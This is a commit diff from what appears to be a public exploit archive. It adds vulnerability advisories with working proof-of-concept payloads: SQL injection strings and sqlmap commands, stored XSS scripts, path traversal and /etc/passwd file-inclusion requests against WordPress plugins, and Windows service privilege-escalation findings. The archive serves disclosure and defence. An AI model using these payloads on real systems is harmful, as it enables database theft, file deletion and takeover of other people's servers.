Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL-- -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc

56
exploits/php/webapps/49542.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/digital-publications-by-supsystic.1.6.9.zip
# Version: 1.6.9
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 20/12 2020: Vulnerability fixed
##################################
Path Traversal and DoS
##################################
# 1. Description
The "Folder" tab under "Publications" is vulnerable to path traversal and exposes information not stored on the web server. The user can gain information regarding images stored in, for example, home directories. The vulnerable code is in the utils.php file, which uses readdir().
# 2. Proof of Concept (PoC)
Enter the payload into the "Folder" input field:
../../../../../../../../../home/erik
However, if the web server attempts to open a folder without read access, the function will run in an infinite loop. For example:
../../../../../../../../../root
The web server will execute the code in an infinite loop and store massive amounts of data in the error.log file until the hard drive is full. The import Folder feature does not work anymore after trying to open directories without read permission when using path traversal techniques. Apache error.log file output:
[Fri Jul 24 20:45:43.739704 2020] [:error] [pid 3516] [client 192.168.0.51:47892] PHP Warning: readdir() expects parameter 1 to be resource, boolean given in /var/www/wordpress/wp-content/plugins/digital-publications-by-supsystic/classes/utils.php on line 137, referer: http://192.168.0.49/wp-admin/term.php?taxonomy=dps_book&tag_ID=16&post_type=post&wp_http_referer=%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Ddps_book
##################################
Stored XSS
##################################
# 1. Description
When adding a new publication under the section "Publications", all values such as Area Width, Publication Width and so on are vulnerable to stored XSS. It is possible to store code in all input fields as the code does not sanitize any user input.
# 2. Proof of Concept (PoC)
Enter the following payload into any input field: "><script>alert(1)</script><!--'
The payload is stored in the publication details and will be executed whenever the user views the "Publications" page or edits a publication.

60
exploits/php/webapps/49543.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/data-tables-generator-by-supsystic.1.9.96.zip
# Category: Web Application
# Version: 1.9.96
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 08/12 2020: Vulnerability fixed
##################################
SQLi
##################################
# 1. Description
The POST parameter "data[search][text_like]" does not sanitize user input when searching for data.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=supsystic-tables
sqlmap -r request.txt --dbms=mysql -p data[search][text_like]
Parameter: data[search][text_like] (POST)
Type: time-based blind
Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' AND (SELECT 4736 FROM (SELECT(SLEEP(5)))iAJy) AND 'iAVl'='iAVl&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables
Type: UNION query
Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' UNION ALL SELECT CONCAT(0x7170707871,0x487a436e5175474a64617446465349535248737249775445424671545a557367704b61424e6d6545,0x7178786b71),NULL-- -&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables
##################################
Stored XSS
##################################
# 1. Description
The "Editor" tab under the "Tables" section is vulnerable to stored XSS. It is possible to store XSS in all input fields as the code does not sanitize any of the user input.
# 2. Proof of Concept (PoC)
Enter the following payload into any input field: "><script>alert(1)</script><!--'
The payload is stored in the document and executes whenever a user visits the "Settings" tab or the document itself.
The document is also cached by the plugin. Therefore, the payload can also be executed by any unauthenticated user visting http://192.168.0.49/wp-content/uploads/supsystic-tables/cache/tables/[YOUR TABLE NUMBER]

61
exploits/php/webapps/49544.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-by-supsystic.1.7.5.zip
# Version: 1.7.5
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 10/12 2020: Vulnerability fixed
##################################
SQLi
##################################
# 1. Description
The GET parameter "sidx" does not sanitize user input when searching for existing contact forms.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for existing contact forms and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic
sqlmap -r request.txt --dbms=mysql -p sidx --level=5
Parameter: sidx (GET)
Type: boolean-based blind
Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=(SELECT (CASE WHEN (9602=9602) THEN 0x6964 ELSE (SELECT 9695 UNION SELECT 1181) END))&sord=desc
Type: time-based blind
Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=id AND (SELECT 4102 FROM (SELECT(SLEEP(5)))vOKL)&sord=desc
##################################
Stored XSS
##################################
# 1. Description
The "Edit name" and "Contact information" features are vulnerable to stored XXS.
Location: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms_edit&id=[FORM ID]
# 2. Proof of Concept (PoC)
Enter the following payload into the "Edit" field in the top left corner: "><script>alert(1)</script><!--'
The payload will execute when viewing the "Show All Forms" section.
Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms

35
exploits/php/webapps/49545.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-by-supsystic.zip
# Version: 2.3.9
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply.
# 29/11 2020: WordPress Plugin Security team contacted
# 01/12 2020: Plugin/Project closed by WordPress Security team
# 1. Description
Changing the path when downloading the stored backup allows an attacker to both read and delete internal system files (LFI).
# 2. Proof of Concept (PoC)
Create a backup. When downloading the backup, change its path:
GET http://192.168.0.49/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd
The "Delete" tab also allows an attacker to delete files on the server:
POST http://192.168.0.49/wp-admin/admin.php?page=supsystic-backup&tab=bupLog
Payload: reqType=ajax&page=backup&action=removeAction&filename=[FILE PATH]&deleteLog=1&pl=bup

107
exploits/windows/local/49530.txt Normal file
View file

@ -0,0 +1,107 @@
# Exploit Title: Millewin 13.39.146.1 - Local Privilege Escalation
# Date: 2021-02-07
# Author: Andrea Intilangelo
# Vendor Homepage: https://www.millewin.it
# Software Homepage: https://www.millewin.it/index.php/prodotti/millewin
# Software Link: https://download.millewin.it/files/Millewin/setup/InstMille_Demo_13.39_2019PS.exe
# Version: 13.39.028 146.1.9
# Tested on: Microsoft Windows 10 Enterprise x64
Millennium Millewin also known as "Cartella clinica"
Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.
Affected version: 13.39.028
13.39.28.3342
13.39.146.1
-
Summary (from online translator):
Millewin represents the Professional Solution par excellence, recognized and supported by over 18,000 doctors. Millewin is able to guarantee ideal management
of the patient's medical records, it also adheres perfectly to the most recent requirements of the General Practitioner and, thanks to the latest functional
innovations, it assists the doctor in the diagnosis and management of therapy. It can be used, at no additional cost, for group medicine and at the secretarial
station. Millewin is integrated with all Regional and Corporate Projects. Millewin modules: ACN, MilleDSS, MilleAIR, Redazione e invio fatture, MilleBook.
Vuln desc:
The application is prone to insecure permissions in its folders that allows unprivileged user complete control. An attacker can exploit the vulnerability by
arbitrarily replacing file(s) invoked by service(s)/startup regkey impacted. File(s) will be executed with SYSTEM privileges.
The application is subject to insecure folders permissions issue impacting the services 'MillewinTaskService' and 'PDS Server' for Windows deployed as part of
Millewin suite (Cartella clinica) software application, and the registy runkey responsible to start update (MilleUpdater) task.
This allow an authorized but non-privileged local or remote user to execute arbitrary code with elevated privileges on the system. An attacker can easily take
advantage of the flaw arbitrarily replacing the impacted file(s) that will be executed during application startup or reboot. If successful, the malicious file(s)
would execute with the elevated privileges of the application.
The application also suffers from unquoted service path issues.
(1) Impacted executable on startup by regkey.
Any low privileged user can elevate their privileges abusing this scenario:
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value name: MilleLiveUpdate
Value data: "C:\Program Files (x86)\Millewin\MilleUpdater\MilleUpdater.exe"
(2) Impacted services.
Any low privileged user can elevate their privileges abusing any of these (also unquoted) services:
Millewin, operazioni pianificate MillewinTaskService C:\Program Files (x86)\Millewin\GestioneTaskService.exe Auto
PDS Server PDS Server C:\Program Files (x86)\Millewin\WatchDogService.exe Auto
Details:
NOME_SERVIZIO: Millewintaskservice
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\Millewin\GestioneTaskService.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : Millewin, operazioni pianificate
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
NOME_SERVIZIO: PDSserver
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\Millewin\WatchDogService.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : PDS Server
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
(3) Folder permissions.
Insecure folders permissions issue:
C:\Program Files (x86)\Millewin
BUILTIN\Users:(OI)(CI)(F)
Everyone:(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE
...[SNIP]...
C:\Program Files (x86)\Millewin\MilleUpdater
BUILTIN\Users:(OI)(CI)(ID)F
Everyone:(OI)(CI)(ID)F
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE
...[SNIP]...

33
exploits/windows/local/49535.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: AMD Fuel Service - 'Fuel.service' Unquote Service Path
# Discovery by: Hector Gerbacio
# Discovery Date: 2021-02-05
# Vendor Homepage: https://www.amd.com/
# Tested Version: 1.0.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 8.1 con Bing
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\WINDOWS\\" | findstr /i "fuel.service" | findstr /i /v """
AMD FUEL Service AMD FUEL Service C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe /launchService Auto
# Service info:
C:\>sc qc "AMD FUEL Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AMD FUEL Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe /launchService
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : AMD FUEL Service
DEPENDENCIAS : RpcSs
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

1213
exploits/windows/local/49541.html Normal file
View file

File diff suppressed because it is too large Load diff

10
exploits/windows/webapps/49536.txt Normal file
View file

@ -0,0 +1,10 @@
# Exploit Title: Alt-N MDaemon webmail 20.0.0 - 'Contact name' Stored Cross Site Scripting (XSS)
# Date: 2020-08-25
# Exploit Author: Kailash Bohara
# Vendor Homepage: https://www.altn.com/
# Version: Mdaemon webmail < 20.0.0
# CVE : 2020-18724
1. Go to contact section and distribution list menu. Create a new distribution list.
2. Contact name field is vulnerabile to XSS. Use the payload <img src=x onerror=alert(1)>
3. We can see execution code and after saving it, each time we visits the distribution list section the XSS pop-up is seen.

10
exploits/windows/webapps/49537.txt Normal file
View file

@ -0,0 +1,10 @@
# Exploit Title: Alt-N MDaemon webmail 20.0.0 - 'file name' Stored Cross Site Scripting (XSS)
# Date: 2020-08-25
# Exploit Author: Kailash Bohara
# Vendor Homepage: https://www.altn.com/
# Version: Mdaemon webmail < 20.0.0
# CVE : 2020-18723
1. Rename a file and set its name as <img src=x onerror=alert(1)>.jpg
2. Go to New mail, select recipient and the select attachment. Code gets executed as right after upload so it becomes self XSS.
3. Send the mail to recipient and open email from recipent side. Opening just a mail doesnt executes the code but when the victim clicks on forward button, XSS pop-up is shown.

19
files_exploits.csv
View file

@ -11254,6 +11254,11 @@ id,file,description,date,author,type,platform,port
49518,exploits/solaris/local/49518.c,"Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3)",2021-02-02,"Marco Ivaldi",local,solaris,
49521,exploits/multiple/local/49521.py,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)",2021-02-03,"West Shepherd",local,multiple,
49522,exploits/multiple/local/49522.c,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)",2021-02-03,nu11secur1ty,local,multiple,
49526,exploits/multiple/local/49526.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution",2021-02-08,LiquidWorm,local,multiple,
49527,exploits/multiple/local/49527.txt,"SmartFoxServer 2X 2.17.0 - Credentials Disclosure",2021-02-08,LiquidWorm,local,multiple,
49530,exploits/windows/local/49530.txt,"Millewin 13.39.146.1 - Local Privilege Escalation",2021-02-08,"Andrea Intilangelo",local,windows,
49535,exploits/windows/local/49535.txt,"AMD Fuel Service - 'Fuel.service' Unquote Service Path",2021-02-08,"Hector Gerbacio",local,windows,
49541,exploits/windows/local/49541.html,"Microsoft Internet Explorer 11 32-bit - Use-After-Free",2021-02-08,"Forrest Orr",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43717,3 +43722,17 @@ id,file,description,date,author,type,platform,port
49523,exploits/php/webapps/49523.txt,"LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)",2021-02-05,SunCSR,webapps,php,
49524,exploits/php/webapps/49524.py,"PhreeBooks 5.2.3 ERP - Remote Code Execution (2)",2021-02-05,Kr0ff,webapps,php,
49525,exploits/php/webapps/49525.py,"SEO Panel 4.6.0 - Remote Code Execution (2)",2021-02-05,Kr0ff,webapps,php,
49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,
49529,exploits/multiple/webapps/49529.txt,"Jenzabar 9.2.2 - 'query' Reflected XSS.",2021-02-08,y0ung_dst,webapps,multiple,
49531,exploits/php/webapps/49531.txt,"WordPress Plugin Welcart e-Commerce 2.0.0 - 'search[order_column][0]' SQL injection",2021-02-08,"Erik David Martin",webapps,php,
49532,exploits/php/webapps/49532.txt,"WordPress Plugin Supsystic Ultimate Maps 1.1.12 - 'sidx' SQL injection",2021-02-08,"Erik David Martin",webapps,php,
49533,exploits/php/webapps/49533.txt,"WordPress Plugin Supsystic Pricing Table 1.8.7 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php,
49534,exploits/php/webapps/49534.txt,"YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery",2021-02-08,"numan türle",webapps,php,
49536,exploits/windows/webapps/49536.txt,"Alt-N MDaemon webmail 20.0.0 - 'Contact name' Stored Cross Site Scripting (XSS)",2021-02-08,"Kailash Bohara",webapps,windows,
49537,exploits/windows/webapps/49537.txt,"Alt-N MDaemon webmail 20.0.0 - 'file name' Stored Cross Site Scripting (XSS)",2021-02-08,"Kailash Bohara",webapps,windows,
49539,exploits/php/webapps/49539.txt,"WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection",2021-02-08,"Erik David Martin",webapps,php,
49540,exploits/php/webapps/49540.txt,"WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection",2021-02-08,"Erik David Martin",webapps,php,
49542,exploits/php/webapps/49542.txt,"WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php,
49543,exploits/php/webapps/49543.txt,"WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php,
49544,exploits/php/webapps/49544.txt,"WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php,
49545,exploits/php/webapps/49545.txt,"WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion",2021-02-08,"Erik David Martin",webapps,php,

Can't render this file because it is too large.